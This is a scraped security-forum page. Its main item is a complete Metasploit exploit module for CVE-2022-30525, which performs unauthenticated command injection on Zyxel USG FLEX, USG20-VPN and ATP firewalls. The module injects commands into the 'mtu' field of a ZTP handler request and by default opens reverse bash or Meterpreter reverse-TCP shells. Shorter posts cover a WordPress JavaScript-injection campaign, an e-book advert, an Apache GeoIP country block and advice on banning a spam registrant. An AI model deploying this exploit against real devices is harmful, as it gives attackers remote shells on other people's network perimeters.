  1. General information

    1. Important announcements

      Important announcements and the forum rules. Read the rules before posting.

      12.6k posts
    2. Welcome

      Welcome to the Romanian Security Team forum; you can introduce yourself here (optional).

      18.1k posts
    3. RST Projects

      Here you will find all the programs, tutorials, methods and exploits created by RST members.

      4.4k posts
  2. Technical section

    1. Exploits

      The newest exploits, POCs or shellcodes

      7.4k posts
    2. Challenges (CTF)

      Challenges and wargames for CTF enthusiasts

      9.5k posts
    3. Bug Bounty

      Category for discussions about sites that run a Bug Bounty program rewarding the people who report vulnerabilities to them

      2.2k posts
    4. Programming

      The programmers' corner: C/C++, Visual Basic, .NET, Java, ASM, Shell scripting, Perl, Python

      22.7k posts
    5. Web security

      Tutorials and discussions about web application security

      635 posts
    6. Reverse engineering & exploit development

      Tutorials on malware analysis, samples, source code, useful programs, reverse engineering and exploit development

      1.9k posts
    7. Mobile security

      Discussions about mobile phones, rooting, jailbreaking etc.

      12.6k posts
    8. Operating systems and hardware discussions

      Hardware discussions, Windows, Unix, BSD etc.

      7.6k posts
    9. Electronics

      General discussions about electronics

      2.6k posts
    10. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth and GSM hacking

      3.8k posts
    11. Black SEO & monetization

      Tips & tricks, questions, monetization

      8.8k posts
  3. Programs

    1. Hacking programs

      Post utilities such as sniffers, bruteforcers, fuzzers etc. here. No requests here.

      28.2k posts
    2. Security programs

      Post programs such as firewalls, antivirus software and similar programs here

      2.7k posts
    3. Useful programs

      Programs that do not fit the other sections: hacking or security

      12.1k posts
    4. Free stuff

      Various useful things, excluding roots, SMTPs, VPSes etc.

      8.7k posts
  4. General discussions

    1. RST Market

      Any sale/purchase related to online/banking fraud or unauthorized access is punished with a permanent ban! Minimum 50 posts for access!

      23.9k posts
    2. Off-topic

      Discussions on various topics that do not fit the other categories. IT-related discussions only!

      137.5k posts
    3. Beginner discussions

      If you are a beginner, have a simple question or want to know more about a field, this is the right section

      3k posts
    4. Security news

      News from the IT security field

      20.3k posts
    5. Links

      Post only security-related links here!

      9.4k posts
    6. Trash can

      All topics that have gone off topic will be moved here.

      45.2k posts
  • Posts

    • This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',
        'Description' => %q{
          This module exploits CVE-2022-30525, an unauthenticated remote
          command injection vulnerability affecting Zyxel firewalls with zero
          touch provisioning (ZTP) support. By sending a malicious setWanPortSt
          command containing an mtu field with a crafted OS command to the
          /ztp/cgi-bin/handler page, an attacker can gain remote command execution
          as the nobody user.

          Affected Zyxel models are:

          * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
          * USG20-VPN and USG20W-VPN using firmware 5.21 and below
          * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jbaines-r7' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2022-30525' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']
        ],
        'DisclosureDate' => '2022-04-28',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_MIPS64,],
        'Privileged' => false,
        'Targets' => [
          [
            'Shell Dropper',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_MIPS64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'wget' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Checks the build date that is embedded in the landing page. If it finds a build
  # date older than April 20, 2022 then it will additionally check if the model is
  # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this
  # seems like a reasonable approach.
  def check
    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))
    unless res
      return CheckCode::Unknown('The target failed to respond to check.')
    end

    unless res.code == 200
      return CheckCode::Safe('Failed to retrieve /')
    end

    ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]
    if ver.nil?
      return CheckCode::Safe('Could not extract a version number')
    end

    if ver[0..5].to_i < 220420
      model = res.get_html_document.xpath('//title').text
      if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
        return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")
      end
    end

    CheckCode::Safe("This determination is based on the build date string: #{ver}.")
  end

  def execute_command(cmd, _opts = {})
    handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')
    print_status("Sending command to #{handler_uri}")

    # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too
    # but it's more involved.
    http_payload = {
      'command' => 'setWanPortSt',
      'proto' => 'dhcp',
      'port' => Rex::Text.rand_text_numeric(4).to_s,
      'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,
      'vlanid' => Rex::Text.rand_text_numeric(4).to_s,
      'mtu' => ";#{cmd};",
      'data' => ''
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => handler_uri,
      'headers' =>
      {
        'Content-Type' => 'application/json; charset=utf-8'
      },
      'data' => http_payload.to_json
    })
    # Successful exploitation can result in no response (connection being held open by a reverse shell)
    # or, if the command executes immediately, a response with a 503.
    if res && res.code != 503
      fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.")
    end
    print_good('Command successfully executed.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end

#  0day.today [2022-05-17]  #
    • Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic.

      This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice.

      The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects.

      In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser.

      The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites.
    • A Drama in Three Acts

      Security is perhaps the most neglected area of information technology. It is extensive, diverse and complex. It is political. It is ungrateful. It is a drama. An attempt to cope in three acts.

      About the Author

      The author has been working for over 25 years in IT and mechanical engineering businesses as an architect, developer, UNIX system/network administrator and entrepreneur. As cofounder of Micro-Colocation.com, his focus since 2021 has been on green edge computing for small computers. This colocation service was recently released and is happy to welcome any Raspberry Pi, Odroid, Jetson Nano and other Single Board Computer enthusiasts. CC licensed texts like this drama are created within the working hours of this company. You can support the text production by sharing the Micro-Colocation.com link in your network and, of course, by booking colocation services. Many thanks.

      Table of Contents

      Prologue (p. 2)
      First Act (p. 4)
        First Scene – The Dilemmas (p. 4)
        Second Scene – The Developer (p. 6)
        Third Scene – The Allies (p. 7)
        Fourth Scene – The Concept (p. 12)
      Second Act (p. 15)
        First Scene – The Application (p. 15)
        Second Scene – The Identification (p. 18)
        Third Scene – The Access (p. 22)
        Fourth Scene – The Encryption (p. 24)
      Third Act (p. 26)
        Last Scene: The Implementation (p. 26)
      Epilogue (p. 29)
      Please / Thank you (p. 29)
      Props (p. 30)

      eBook Versions:

      English Translation: IT Security for Developers — A Drama in Three Acts | May 2022

      German original version, recommended for native speakers: IT Sicherheit für Entwickler — Ein Drama in drei Akten | May 2022
    • Good idea. With the GeoIP mod for Apache:

      GeoIPEnable On
      # to hell with all of you, and we're rid of the hassle :))
      SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry
      SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry
      SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry
      SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry
      <RequireAll>
          Require all granted
          Require not env BlockCountry
      </RequireAll>
    • SirGod, with these things I'm really out of my depth, sorry...!!!
    • You also need a bit of custom code alongside the integration. You integrate it into the site, save the fingerprints, and when you match a user (e.g. account name, posts) to a fingerprint, you use it to block them (you have several options here: client-side, or you send the fingerprint to the server side and block at the .htaccess level, in code, etc.).
    • This intRUS has been terrorizing me... he makes about 100 registrations a day on the forum...!!! How do I get rid of THIS...???
    • Thanks, Dragos, but since I'm out of my depth in programming, I'd be grateful if you could help me with this kind of IP address blocking in the IPS Community Suite forum...!!! Regards...!!!
    • You can ban via htaccess: https://htaccessbook.com/block-ip-address/